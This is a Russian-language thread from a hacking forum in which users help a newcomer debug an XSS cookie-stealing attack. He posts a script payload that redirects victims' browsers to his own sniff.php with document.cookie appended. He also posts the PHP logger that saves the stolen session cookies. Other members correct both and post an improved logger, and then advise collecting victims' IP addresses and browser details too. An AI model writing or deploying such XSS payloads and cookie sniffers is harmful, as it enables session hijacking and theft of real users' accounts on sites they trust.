Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Нужна помощь. Видать в запросе... |
04.03.2007, 15:37
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362
Репутация:
0
|
|
Нужна помощь. Видать в запросе...
Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:
<script&qt; document.location.href="http://www.humora.net.ru/Files/sniff.php"+ document.cookie; </script&qt;
Где sniff.php содержит такие строки:
PHP код:
<?
$f = fopen("snif.txt", "a");
fwrite($f, $REQUEST_URI);
fclose($f);
print("OK");
?&qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie 
Подскажите че нетак, плиз, а то не знаю уже че за фигня |
|
|
04.03.2007, 16:53
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
у тя он записывает тока урл. Всё дело в сниффере. Ты пишешь:
http://www.humora.net.ru/Files/sniff.php+ document.cookie
И переходит на урл+куки.
|
|
|
|
04.03.2007, 17:01
|
|
Участник форума
Регистрация: 06.04.2006
Сообщений: 257
Провел на форуме:
367179
Репутация:
76
|
|
Просто добавь знак вопроса:
http://www.humora.net.ru/Files/sniff.php?
В снифере замени $REQUEST_URI на "$QUERY_STRING \n"
|
|
|
|
04.03.2007, 17:15
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
$_server['query_string']; лучше |
|
|
|
04.03.2007, 17:32
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362
Репутация:
0
|
|
Cпасибо Чето я и правду запарился) Щас буду пробовать |
|
|
|
04.03.2007, 17:38
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362
Репутация:
0
|
|
Хм.. Все сделал, поставил "?" теперь это выглядит так:
===
Parse error: syntax error, unexpected '?' in /var/www/user***/html/humora.net.ru/Files/sniff.php on line 6
===
тут код снифера:
===
<?
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?&qt;
===
туплю чето опять |
|
|
|
04.03.2007, 17:42
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362
Репутация:
0
|
|
аа все, уже не глючит , новый код:
===
<?php
$f = fopen("snif.txt", "a");
fwrite($f, $_server['query_string']);
fclose($f);
print("OK");
?>
=== |
|
|
|
04.03.2007, 17:42
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
PHP код:
<?php
if($_SERVER['QUERY_STRING']){
$f = fopen("log", "a");
fwrite($f, $_SERVER['QUERY_STRING']."\n\n");
fclose($f);
}
?>
|
|
|
|
04.03.2007, 18:24
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 6
Провел на форуме:
6362
Репутация:
0
|
|
а может вы мне поможете к этому сниферу какие нибудь фишки прикрутить
ну там чтобы он какую нибудь инфу о компе собирал, какой нето Ip-адрес, браузер или еще чего-нибудь по удобней ? |
|
|
|
08.03.2007, 14:47
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
тебе нужно тока версия браузера, урл и ип. Ничё лишнего. Ну можешь ещё сделать, чтоб одинаковые записи удалялись  В иненте полно пхп-снифферов, даже на этом сайте есть выложенный где-то... Поиском пройдись |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
